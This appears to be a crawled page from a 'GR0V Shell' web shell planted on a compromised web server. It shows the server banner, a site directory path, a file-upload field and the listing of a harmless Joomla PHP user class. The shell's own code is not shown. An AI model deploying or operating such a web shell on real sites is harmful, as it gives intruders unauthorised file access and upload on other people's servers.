? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/components/libraries/cmslib/libraries/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/components/libraries/cmslib/libraries/user.php

<?php
(defined('_VALID_MOS') OR defined('_JEXEC')) or die('Direct Access to this location is not allowed.');

class CMSUser {
	var $name	  = null;
	var $username = null;
	var $id		= null;
	var $email	= null;
	var $usertype = null;

	function CMSUser(){
		
		if(cmsVersion() == _CMS_JOOMLA15){
			//$my = & JUser::getInstance();
			$my =& JFactory::getUser();
			$this->id = $my->id;
			$this->email = $my->email;
			$this->name = $my->name;
			$this->username = $my->username;
			$this->usertype = $my->usertype;
			
		} else {
			global $my;
			$this->id = $my->id;
			$this->name = $my->name;
			$this->email = $my->email;
			$this->username = $my->username;
			$this->usertype = $my->usertype;
		}
	}
}

T1KUS90T
  root-grov@210.1.60.28:~$